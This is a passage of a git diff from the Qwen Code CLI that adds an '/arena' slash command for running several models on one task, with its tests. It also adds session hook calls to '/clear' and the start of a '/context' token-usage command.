'./types.js'; +import { createMockCommandContext } from '../../test-utils/mockCommandContext.js'; + +function getArenaSubCommand( + name: 'start' | 'stop' | 'status' | 'select', +): SlashCommand { + const command = 
arenaCommand.subCommands?.find((item) => item.name === name); + if (!command?.action) { + throw new Error(`Arena subcommand "${name}" is missing an action`); + } + return command; +} + +describe('arenaCommand stop subcommand', () => { + let mockContext: CommandContext; + let mockConfig: { + getArenaManager: ReturnType; + setArenaManager: ReturnType; + cleanupArenaRuntime: ReturnType; + getAgentsSettings: ReturnType; + }; + + beforeEach(() => { + mockConfig = { + getArenaManager: vi.fn(() => null), + setArenaManager: vi.fn(), + cleanupArenaRuntime: vi.fn().mockResolvedValue(undefined), + getAgentsSettings: vi.fn(() => ({})), + }; + + mockContext = createMockCommandContext({ + invocation: { + raw: '/arena stop', + name: 'arena', + args: 'stop', + }, + executionMode: 'interactive', + services: { + config: mockConfig as never, + }, + }); + }); + + it('returns an error when no arena session is running', async () => { + const stopCommand = getArenaSubCommand('stop'); + const result = await stopCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No running Arena session found.', + }); + }); + + it('opens stop dialog when a running session exists', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.RUNNING), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const stopCommand = getArenaSubCommand('stop'); + const result = (await stopCommand.action!( + mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_stop', + }); + }); + + it('opens stop dialog when a completed session exists', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const stopCommand = getArenaSubCommand('stop'); + const result = (await stopCommand.action!( + 
mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_stop', + }); + }); +}); + +describe('arenaCommand status subcommand', () => { + let mockContext: CommandContext; + let mockConfig: { + getArenaManager: ReturnType; + }; + + beforeEach(() => { + mockConfig = { + getArenaManager: vi.fn(() => null), + }; + + mockContext = createMockCommandContext({ + invocation: { + raw: '/arena status', + name: 'arena', + args: 'status', + }, + executionMode: 'interactive', + services: { + config: mockConfig as never, + }, + }); + }); + + it('returns an error when no arena session exists', async () => { + const statusCommand = getArenaSubCommand('status'); + const result = await statusCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No Arena session found. Start one with /arena start.', + }); + }); + + it('opens status dialog when a session exists', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.RUNNING), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const statusCommand = getArenaSubCommand('status'); + const result = (await statusCommand.action!( + mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_status', + }); + }); + + it('opens status dialog for completed session', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const statusCommand = getArenaSubCommand('status'); + const result = (await statusCommand.action!( + mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_status', + }); + }); +}); + +describe('arenaCommand select subcommand', () => { + let mockContext: CommandContext; + let mockConfig: 
{ + getArenaManager: ReturnType; + setArenaManager: ReturnType; + cleanupArenaRuntime: ReturnType; + getAgentsSettings: ReturnType; + }; + + beforeEach(() => { + mockConfig = { + getArenaManager: vi.fn(() => null), + setArenaManager: vi.fn(), + cleanupArenaRuntime: vi.fn().mockResolvedValue(undefined), + getAgentsSettings: vi.fn(() => ({})), + }; + + mockContext = createMockCommandContext({ + invocation: { + raw: '/arena select', + name: 'arena', + args: 'select', + }, + executionMode: 'interactive', + services: { + config: mockConfig as never, + }, + }); + }); + + it('returns error when no arena session exists', async () => { + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }); + }); + + it('returns error when arena is still running', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.RUNNING), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: + 'Arena session is still running. 
Wait for it to complete or use /arena stop first.', + }); + }); + + it('returns error when all agents failed', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.FAILED, + model: { modelId: 'model-1' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: + 'No successful agent results to select from. All agents failed or were cancelled.\n' + + 'Use /arena stop to end the session.', + }); + }); + + it('opens dialog when no args provided and agents have results', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'model-1' }, + }, + { + agentId: 'agent-2', + status: AgentStatus.COMPLETED, + model: { modelId: 'model-2' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_select', + }); + }); + + it('applies changes directly when model name is provided', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o', displayName: 'gpt-4o' }, + }, + { + agentId: 'agent-2', + status: AgentStatus.COMPLETED, + model: { modelId: 'claude-sonnet', displayName: 'claude-sonnet' }, + }, + ]), + applyAgentResult: vi.fn().mockResolvedValue({ success: true }), + 
cleanup: vi.fn().mockResolvedValue(undefined), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, 'gpt-4o'); + + expect(mockManager.applyAgentResult).toHaveBeenCalledWith('agent-1'); + expect(mockConfig.cleanupArenaRuntime).toHaveBeenCalled(); + expect(result).toEqual({ + type: 'message', + messageType: 'info', + content: + 'Applied changes from gpt-4o to workspace. Arena session complete.', + }); + }); + + it('returns error when specified model not found', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o', displayName: 'gpt-4o' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, 'nonexistent'); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No idle agent found matching "nonexistent".', + }); + }); + + it('asks for confirmation when --discard flag is used', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o' }, + }, + ]), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, '--discard'); + + expect(result).toEqual({ + type: 'confirm_action', + prompt: 'Discard all Arena results and clean up worktrees?', + originalInvocation: { raw: '/arena select' }, + }); + }); + + it('discards results after --discard confirmation', async () => { + 
const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + getAgentStates: vi.fn(() => [ + { + agentId: 'agent-1', + status: AgentStatus.COMPLETED, + model: { modelId: 'gpt-4o' }, + }, + ]), + cleanup: vi.fn().mockResolvedValue(undefined), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + mockContext.overwriteConfirmed = true; + + const selectCommand = getArenaSubCommand('select'); + const result = await selectCommand.action!(mockContext, '--discard'); + + expect(mockConfig.cleanupArenaRuntime).toHaveBeenCalled(); + expect(result).toEqual({ + type: 'message', + messageType: 'info', + content: 'Arena results discarded. All worktrees cleaned up.', + }); + }); +}); diff --git a/packages/cli/src/ui/commands/arenaCommand.ts b/packages/cli/src/ui/commands/arenaCommand.ts new file mode 100644 index 000000000..c178a021d --- /dev/null +++ b/packages/cli/src/ui/commands/arenaCommand.ts @@ -0,0 +1,659 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { + SlashCommand, + CommandContext, + ConfirmActionReturn, + MessageActionReturn, + OpenDialogActionReturn, + SlashCommandActionReturn, +} from './types.js'; +import { CommandKind } from './types.js'; +import { + ArenaManager, + ArenaEventType, + isTerminalStatus, + isSuccessStatus, + ArenaSessionStatus, + AuthType, + createDebugLogger, + stripStartupContext, + type Config, + type ArenaModelConfig, + type ArenaAgentErrorEvent, + type ArenaAgentCompleteEvent, + type ArenaAgentStartEvent, + type ArenaSessionCompleteEvent, + type ArenaSessionErrorEvent, + type ArenaSessionStartEvent, + type ArenaSessionUpdateEvent, +} from '@qwen-code/qwen-code-core'; +import { + MessageType, + type ArenaAgentCardData, + type HistoryItemWithoutId, +} from '../types.js'; + +/** + * Parsed model entry with optional auth type. 
+ */ +interface ParsedModel { + authType?: string; + modelId: string; +} + +/** + * Parses arena command arguments. + * + * Supported formats: + * /arena start --models model1,model2 + * /arena start --models authType1:model1,authType2:model2 + * + * Model format: [authType:]modelId + * - "gpt-4o" → uses default auth type + * - "openai:gpt-4o" → uses "openai" auth type + */ +function parseArenaArgs(args: string): { + models: ParsedModel[]; + task: string; +} { + const modelsMatch = args.match(/--models\s+(\S+)/); + + let models: ParsedModel[] = []; + let task = args; + + if (modelsMatch) { + const modelStrings = modelsMatch[1]!.split(',').filter(Boolean); + models = modelStrings.map((str) => { + // Check for authType:modelId format + const colonIndex = str.indexOf(':'); + if (colonIndex > 0) { + return { + authType: str.substring(0, colonIndex), + modelId: str.substring(colonIndex + 1), + }; + } + return { modelId: str }; + }); + task = task.replace(/--models\s+\S+/, '').trim(); + } + + // Strip surrounding quotes from task + task = task.replace(/^["']|["']$/g, '').trim(); + + return { models, task }; +} + +const debugLogger = createDebugLogger('ARENA_COMMAND'); + +interface ArenaExecutionInput { + task: string; + models: ArenaModelConfig[]; + approvalMode?: string; +} + +function buildArenaExecutionInput( + parsed: ReturnType, + config: Config, +): ArenaExecutionInput | MessageActionReturn { + if (!parsed.task) { + return { + type: 'message', + messageType: 'error', + content: + 'Usage: /arena start --models model1,model2 \n' + + '\n' + + 'Options:\n' + + ' --models [authType:]model1,[authType:]model2\n' + + ' Models to compete (required, at least 2)\n' + + ' Format: authType:modelId or just modelId\n' + + '\n' + + 'Examples:\n' + + ' /arena start --models openai:gpt-4o,anthropic:claude-3 "implement sorting"\n' + + ' /arena start --models qwen-coder-plus,kimi-for-coding "fix the bug"', + }; + } + + if (parsed.models.length < 2) { + return { + type: 'message', + 
messageType: 'error', + content: + 'Arena requires at least 2 models. Use --models model1,model2 to specify.\n' + + 'Format: [authType:]modelId (e.g., openai:gpt-4o or just gpt-4o)', + }; + } + + // Get the current auth type as default for models without explicit auth type + const contentGeneratorConfig = config.getContentGeneratorConfig(); + const defaultAuthType = + contentGeneratorConfig?.authType ?? AuthType.USE_OPENAI; + + // Build ArenaModelConfig for each model, resolving display names from + // the model registry when available. + const modelsConfig = config.getModelsConfig(); + const models: ArenaModelConfig[] = parsed.models.map((parsedModel) => { + const authType = + (parsedModel.authType as AuthType | undefined) ?? defaultAuthType; + const registryModels = modelsConfig.getAvailableModelsForAuthType(authType); + const resolved = registryModels.find((m) => m.id === parsedModel.modelId); + return { + modelId: parsedModel.modelId, + authType, + displayName: resolved?.label ?? parsedModel.modelId, + }; + }); + + return { + task: parsed.task, + models, + approvalMode: config.getApprovalMode(), + }; +} + +/** + * Persists a single arena history item to the session JSONL file. + * + * Arena events fire asynchronously (after the slash command's recording + * window has closed), so each item must be recorded individually. + */ +function recordArenaItem(config: Config, item: HistoryItemWithoutId): void { + try { + const chatRecorder = config.getChatRecordingService(); + if (!chatRecorder) return; + chatRecorder.recordSlashCommand({ + phase: 'result', + rawCommand: '/arena', + outputHistoryItems: [{ ...item } as Record], + }); + } catch { + debugLogger.error('Failed to record arena history item'); + } +} + +function executeArenaCommand( + config: Config, + ui: CommandContext['ui'], + input: ArenaExecutionInput, +): void { + // Capture the main session's chat history so arena agents start with + // conversational context. 
Strip the leading startup context (env info + // user message + model ack) because each agent generates its own for + // its worktree directory — keeping the parent's would duplicate it. + let chatHistory; + try { + const fullHistory = config.getGeminiClient().getHistory(); + chatHistory = stripStartupContext(fullHistory); + } catch { + debugLogger.debug('Could not retrieve chat history for arena agents'); + } + + const manager = new ArenaManager(config); + const emitter = manager.getEventEmitter(); + const detachListeners: Array<() => void> = []; + const agentLabels = new Map(); + + const addArenaMessage = ( + type: 'info' | 'warning' | 'error' | 'success', + text: string, + ) => { + ui.addItem({ type, text }, Date.now()); + }; + + const addAndRecordArenaMessage = ( + type: 'info' | 'warning' | 'error' | 'success', + text: string, + ) => { + const item: HistoryItemWithoutId = { type, text }; + ui.addItem(item, Date.now()); + recordArenaItem(config, item); + }; + + const handleSessionStart = (event: ArenaSessionStartEvent) => { + const modelList = event.models + .map((model, index) => ` ${index + 1}. ${model.modelId}`) + .join('\n'); + // SESSION_START fires synchronously before the first await in + // ArenaManager.start(), so the slash command processor's finally + // block already captures this item — no extra recording needed. 
+ addArenaMessage( + MessageType.INFO, + `Arena started with ${event.models.length} agents on task: "${event.task}"\nModels:\n${modelList}`, + ); + }; + + const handleAgentStart = (event: ArenaAgentStartEvent) => { + agentLabels.set(event.agentId, event.model.modelId); + debugLogger.debug( + `Arena agent started: ${event.model.modelId} (${event.agentId})`, + ); + }; + + const handleSessionUpdate = (event: ArenaSessionUpdateEvent) => { + const attachHintPrefix = 'To view agent panes, run: '; + if (event.message.startsWith(attachHintPrefix)) { + const command = event.message.slice(attachHintPrefix.length).trim(); + addAndRecordArenaMessage( + MessageType.INFO, + `Arena panes are running in tmux. Attach with: \`${command}\``, + ); + return; + } + + if (event.type === 'success') { + addAndRecordArenaMessage(MessageType.SUCCESS, event.message); + } else if (event.type === 'info') { + addAndRecordArenaMessage(MessageType.INFO, event.message); + } else { + addAndRecordArenaMessage(MessageType.WARNING, event.message); + } + }; + + const handleAgentError = (event: ArenaAgentErrorEvent) => { + const label = agentLabels.get(event.agentId) || event.agentId; + addAndRecordArenaMessage( + MessageType.ERROR, + `[${label}] failed: ${event.error}`, + ); + }; + + const buildAgentCardData = ( + result: ArenaAgentCompleteEvent['result'], + ): ArenaAgentCardData => ({ + label: result.model.modelId, + status: result.status, + durationMs: result.stats.durationMs, + totalTokens: result.stats.totalTokens, + inputTokens: result.stats.inputTokens, + outputTokens: result.stats.outputTokens, + toolCalls: result.stats.toolCalls, + successfulToolCalls: result.stats.successfulToolCalls, + failedToolCalls: result.stats.failedToolCalls, + rounds: result.stats.rounds, + error: result.error, + diff: result.diff, + }); + + const handleAgentComplete = (event: ArenaAgentCompleteEvent) => { + if (!isTerminalStatus(event.result.status)) { + return; + } + + const agent = buildAgentCardData(event.result); + 
const item = { + type: 'arena_agent_complete', + agent, + } as HistoryItemWithoutId; + ui.addItem(item, Date.now()); + recordArenaItem(config, item); + }; + + const handleSessionError = (event: ArenaSessionErrorEvent) => { + addAndRecordArenaMessage(MessageType.ERROR, `${event.error}`); + }; + + const handleSessionComplete = (event: ArenaSessionCompleteEvent) => { + const item = { + type: 'arena_session_complete', + sessionStatus: event.result.status, + task: event.result.task, + totalDurationMs: event.result.totalDurationMs ?? 0, + agents: event.result.agents.map(buildAgentCardData), + } as HistoryItemWithoutId; + ui.addItem(item, Date.now()); + recordArenaItem(config, item); + }; + + emitter.on(ArenaEventType.SESSION_START, handleSessionStart); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_START, handleSessionStart), + ); + emitter.on(ArenaEventType.AGENT_START, handleAgentStart); + detachListeners.push(() => + emitter.off(ArenaEventType.AGENT_START, handleAgentStart), + ); + emitter.on(ArenaEventType.SESSION_UPDATE, handleSessionUpdate); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_UPDATE, handleSessionUpdate), + ); + emitter.on(ArenaEventType.AGENT_ERROR, handleAgentError); + detachListeners.push(() => + emitter.off(ArenaEventType.AGENT_ERROR, handleAgentError), + ); + emitter.on(ArenaEventType.AGENT_COMPLETE, handleAgentComplete); + detachListeners.push(() => + emitter.off(ArenaEventType.AGENT_COMPLETE, handleAgentComplete), + ); + emitter.on(ArenaEventType.SESSION_ERROR, handleSessionError); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_ERROR, handleSessionError), + ); + emitter.on(ArenaEventType.SESSION_COMPLETE, handleSessionComplete); + detachListeners.push(() => + emitter.off(ArenaEventType.SESSION_COMPLETE, handleSessionComplete), + ); + + config.setArenaManager(manager); + + const cols = process.stdout.columns || 120; + const rows = Math.max((process.stdout.rows || 40) - 2, 1); + + const 
lifecycle = manager + .start({ + task: input.task, + models: input.models, + cols, + rows, + approvalMode: input.approvalMode, + chatHistory, + }) + .then( + () => { + debugLogger.debug('Arena agents settled'); + }, + (error) => { + const message = error instanceof Error ? error.message : String(error); + addAndRecordArenaMessage(MessageType.ERROR, `${message}`); + debugLogger.error('Arena session failed:', error); + + // Clear the stored manager so subsequent /arena start calls + // are not blocked by the stale reference after a startup failure. + config.setArenaManager(null); + + // Detach listeners on failure — session is done for good. + for (const detach of detachListeners) { + detach(); + } + }, + ); + + // NOTE: listeners are NOT detached when start() resolves because agents + // may still be alive (IDLE) and accept follow-up tasks. The listeners + // reference this manager's emitter, so they are garbage collected when + // the manager is cleaned up and replaced. + + // Store so that stop can wait for start() to fully unwind before cleanup + manager.setLifecyclePromise(lifecycle); +} + +export const arenaCommand: SlashCommand = { + name: 'arena', + description: 'Manage Arena sessions', + kind: CommandKind.BUILT_IN, + subCommands: [ + { + name: 'start', + description: + 'Start an Arena session with multiple models competing on the same task', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + args: string, + ): Promise => { + const executionMode = context.executionMode ?? 'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: + 'Arena is not supported in non-interactive mode. 
Use interactive mode to start an Arena session.', + }; + } + + const { services, ui } = context; + const { config } = services; + + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + // Refuse to start if a session already exists (regardless of status) + const existingManager = config.getArenaManager(); + if (existingManager) { + return { + type: 'message', + messageType: 'error', + content: + 'An Arena session exists. Use /arena stop or /arena select to end it before starting a new one.', + }; + } + + const parsed = parseArenaArgs(args); + if (parsed.models.length === 0) { + return { + type: 'dialog', + dialog: 'arena_start', + }; + } + + const executionInput = buildArenaExecutionInput(parsed, config); + if ('type' in executionInput) { + return executionInput; + } + + executeArenaCommand(config, ui, executionInput); + }, + }, + { + name: 'stop', + description: 'Stop the current Arena session', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + ): Promise => { + const executionMode = context.executionMode ?? 'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: + 'Arena is not supported in non-interactive mode. Use interactive mode to stop an Arena session.', + }; + } + + const { config } = context.services; + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + const manager = config.getArenaManager(); + if (!manager) { + return { + type: 'message', + messageType: 'error', + content: 'No running Arena session found.', + }; + } + + return { + type: 'dialog', + dialog: 'arena_stop', + }; + }, + }, + { + name: 'status', + description: 'Show the current Arena session status', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + ): Promise => { + const executionMode = context.executionMode ?? 
'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: 'Arena is not supported in non-interactive mode.', + }; + } + + const { config } = context.services; + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + const manager = config.getArenaManager(); + if (!manager) { + return { + type: 'message', + messageType: 'error', + content: 'No Arena session found. Start one with /arena start.', + }; + } + + return { + type: 'dialog', + dialog: 'arena_status', + }; + }, + }, + { + name: 'select', + altNames: ['choose'], + description: + 'Select a model result and merge its diff into the current workspace', + kind: CommandKind.BUILT_IN, + action: async ( + context: CommandContext, + args: string, + ): Promise< + | void + | MessageActionReturn + | OpenDialogActionReturn + | ConfirmActionReturn + > => { + const executionMode = context.executionMode ?? 'interactive'; + if (executionMode !== 'interactive') { + return { + type: 'message', + messageType: 'error', + content: 'Arena is not supported in non-interactive mode.', + }; + } + + const { config } = context.services; + if (!config) { + return { + type: 'message', + messageType: 'error', + content: 'Configuration not available.', + }; + } + + const manager = config.getArenaManager(); + + if (!manager) { + return { + type: 'message', + messageType: 'error', + content: 'No arena session found. Start one with /arena start.', + }; + } + + const sessionStatus = manager.getSessionStatus(); + if ( + sessionStatus === ArenaSessionStatus.RUNNING || + sessionStatus === ArenaSessionStatus.INITIALIZING + ) { + return { + type: 'message', + messageType: 'error', + content: + 'Arena session is still running. Wait for it to complete or use /arena stop first.', + }; + } + + // Handle --discard flag before checking for successful agents, + // so users can clean up worktrees even when all agents failed. 
+ const trimmedArgs = args.trim(); + if (trimmedArgs === '--discard') { + if (!context.overwriteConfirmed) { + return { + type: 'confirm_action', + prompt: 'Discard all Arena results and clean up worktrees?', + originalInvocation: { + raw: context.invocation?.raw || '/arena select --discard', + }, + }; + } + + await config.cleanupArenaRuntime(true); + return { + type: 'message', + messageType: 'info', + content: 'Arena results discarded. All worktrees cleaned up.', + }; + } + + const agents = manager.getAgentStates(); + const hasSuccessful = agents.some((a) => isSuccessStatus(a.status)); + + if (!hasSuccessful) { + return { + type: 'message', + messageType: 'error', + content: + 'No successful agent results to select from. All agents failed or were cancelled.\n' + + 'Use /arena stop to end the session.', + }; + } + + // Handle direct model selection via args + if (trimmedArgs) { + const matchingAgent = agents.find( + (a) => + isSuccessStatus(a.status) && + a.model.modelId.toLowerCase() === trimmedArgs.toLowerCase(), + ); + + if (!matchingAgent) { + return { + type: 'message', + messageType: 'error', + content: `No idle agent found matching "${trimmedArgs}".`, + }; + } + + const label = matchingAgent.model.modelId; + const result = await manager.applyAgentResult(matchingAgent.agentId); + if (!result.success) { + return { + type: 'message', + messageType: 'error', + content: `Failed to apply changes from ${label}: ${result.error}`, + }; + } + + await config.cleanupArenaRuntime(true); + return { + type: 'message', + messageType: 'info', + content: `Applied changes from ${label} to workspace. 
Arena session complete.`, + }; + } + + // No args → open the select dialog + return { + type: 'dialog', + dialog: 'arena_select', + }; + }, + }, + ], +}; diff --git a/packages/cli/src/ui/commands/clearCommand.test.ts b/packages/cli/src/ui/commands/clearCommand.test.ts index e94c974fb..5887a8012 100644 --- a/packages/cli/src/ui/commands/clearCommand.test.ts +++ b/packages/cli/src/ui/commands/clearCommand.test.ts @@ -8,6 +8,10 @@ import { vi, describe, it, expect, beforeEach } from 'vitest'; import { clearCommand } from './clearCommand.js'; import { type CommandContext } from './types.js'; import { createMockCommandContext } from '../../test-utils/mockCommandContext.js'; +import { + SessionEndReason, + SessionStartSource, +} from '@qwen-code/qwen-code-core'; // Mock the telemetry service vi.mock('@qwen-code/qwen-code-core', async () => { @@ -26,10 +30,19 @@ describe('clearCommand', () => { let mockContext: CommandContext; let mockResetChat: ReturnType; let mockStartNewSession: ReturnType; + let mockFireSessionEndEvent: ReturnType; + let mockFireSessionStartEvent: ReturnType; + let mockGetHookSystem: ReturnType; beforeEach(() => { mockResetChat = vi.fn().mockResolvedValue(undefined); mockStartNewSession = vi.fn().mockReturnValue('new-session-id'); + mockFireSessionEndEvent = vi.fn().mockResolvedValue(undefined); + mockFireSessionStartEvent = vi.fn().mockResolvedValue(undefined); + mockGetHookSystem = vi.fn().mockReturnValue({ + fireSessionEndEvent: mockFireSessionEndEvent, + fireSessionStartEvent: mockFireSessionStartEvent, + }); vi.clearAllMocks(); mockContext = createMockCommandContext({ @@ -40,6 +53,12 @@ describe('clearCommand', () => { resetChat: mockResetChat, }) as unknown as GeminiClient, startNewSession: mockStartNewSession, + getHookSystem: mockGetHookSystem, + getDebugLogger: () => ({ + warn: vi.fn(), + }), + getModel: () => 'test-model', + getToolRegistry: () => undefined, }, }, session: { @@ -75,6 +94,50 @@ describe('clearCommand', () => { 
expect(mockContext.ui.clear).toHaveBeenCalled(); }); + it('should fire SessionEnd event before clearing and SessionStart event after clearing', async () => { + if (!clearCommand.action) { + throw new Error('clearCommand must have an action.'); + } + + await clearCommand.action(mockContext, ''); + + expect(mockGetHookSystem).toHaveBeenCalled(); + expect(mockFireSessionEndEvent).toHaveBeenCalledWith( + SessionEndReason.Clear, + ); + expect(mockFireSessionStartEvent).toHaveBeenCalledWith( + SessionStartSource.Clear, + 'test-model', + ); + + // SessionEnd should be called before SessionStart + const sessionEndCallOrder = + mockFireSessionEndEvent.mock.invocationCallOrder[0]; + const sessionStartCallOrder = + mockFireSessionStartEvent.mock.invocationCallOrder[0]; + expect(sessionEndCallOrder).toBeLessThan(sessionStartCallOrder); + }); + + it('should handle hook errors gracefully and continue execution', async () => { + if (!clearCommand.action) { + throw new Error('clearCommand must have an action.'); + } + + mockFireSessionEndEvent.mockRejectedValue( + new Error('SessionEnd hook failed'), + ); + mockFireSessionStartEvent.mockRejectedValue( + new Error('SessionStart hook failed'), + ); + + await clearCommand.action(mockContext, ''); + + // Should still complete the clear operation despite hook errors + expect(mockStartNewSession).toHaveBeenCalledTimes(1); + expect(mockResetChat).toHaveBeenCalledTimes(1); + expect(mockContext.ui.clear).toHaveBeenCalledTimes(1); + }); + it('should not attempt to reset chat if config service is not available', async () => { if (!clearCommand.action) { throw new Error('clearCommand must have an action.'); diff --git a/packages/cli/src/ui/commands/clearCommand.ts b/packages/cli/src/ui/commands/clearCommand.ts index dd774934b..7de8192e2 100644 --- a/packages/cli/src/ui/commands/clearCommand.ts +++ b/packages/cli/src/ui/commands/clearCommand.ts @@ -7,7 +7,13 @@ import type { SlashCommand } from './types.js'; import { CommandKind } from 
'./types.js'; import { t } from '../../i18n/index.js'; -import { uiTelemetryService } from '@qwen-code/qwen-code-core'; +import { + uiTelemetryService, + SessionEndReason, + SessionStartSource, + ToolNames, + SkillTool, +} from '@qwen-code/qwen-code-core'; export const clearCommand: SlashCommand = { name: 'clear', @@ -20,11 +26,29 @@ export const clearCommand: SlashCommand = { const { config } = context.services; if (config) { + // Fire SessionEnd event before clearing (current session ends) + try { + await config + .getHookSystem() + ?.fireSessionEndEvent(SessionEndReason.Clear); + } catch (err) { + config.getDebugLogger().warn(`SessionEnd hook failed: ${err}`); + } + const newSessionId = config.startNewSession(); // Reset UI telemetry metrics for the new session uiTelemetryService.reset(); + // Clear loaded-skills tracking so /context doesn't show stale data + const skillTool = config + .getToolRegistry() + ?.getAllTools() + .find((tool) => tool.name === ToolNames.SKILL); + if (skillTool instanceof SkillTool) { + skillTool.clearLoadedSkills(); + } + if (newSessionId && context.session.startNewSession) { context.session.startNewSession(newSessionId); } @@ -40,6 +64,18 @@ export const clearCommand: SlashCommand = { } else { context.ui.setDebugMessage(t('Starting a new session and clearing.')); } + + // Fire SessionStart event after clearing (new session starts) + try { + await config + .getHookSystem() + ?.fireSessionStartEvent( + SessionStartSource.Clear, + config.getModel() ?? 
'', + ); + } catch (err) { + config.getDebugLogger().warn(`SessionStart hook failed: ${err}`); + } } else { context.ui.setDebugMessage(t('Starting a new session and clearing.')); } diff --git a/packages/cli/src/ui/commands/contextCommand.ts b/packages/cli/src/ui/commands/contextCommand.ts new file mode 100644 index 000000000..c693606a9 --- /dev/null +++ b/packages/cli/src/ui/commands/contextCommand.ts @@ -0,0 +1,376 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { + type CommandContext, + type SlashCommand, + CommandKind, +} from './types.js'; +import { + MessageType, + type HistoryItemContextUsage, + type ContextCategoryBreakdown, + type ContextToolDetail, + type ContextMemoryDetail, + type ContextSkillDetail, +} from '../types.js'; +import { + DiscoveredMCPTool, + uiTelemetryService, + getCoreSystemPrompt, + DEFAULT_TOKEN_LIMIT, + ToolNames, + SkillTool, + buildSkillLlmContent, +} from '@qwen-code/qwen-code-core'; +import { t } from '../../i18n/index.js'; + +/** + * Default compression token threshold (triggers compression at 70% usage). + * The autocompact buffer is (1 - threshold) * contextWindowSize. + */ +const DEFAULT_COMPRESSION_THRESHOLD = 0.7; + +/** + * Estimate token count for a string using a character-based heuristic. + * ASCII chars ≈ 4 chars/token, CJK/non-ASCII chars ≈ 1.5 tokens/char. + */ +function estimateTokens(text: string): number { + if (!text || text.length === 0) return 0; + let asciiChars = 0; + let nonAsciiChars = 0; + for (let i = 0; i < text.length; i++) { + const charCode = text.charCodeAt(i); + if (charCode < 128) { + asciiChars++; + } else { + nonAsciiChars++; + } + } + // CJK and other non-ASCII characters typically produce 1.5-2 tokens each + return Math.ceil(asciiChars / 4 + nonAsciiChars * 1.5); +} 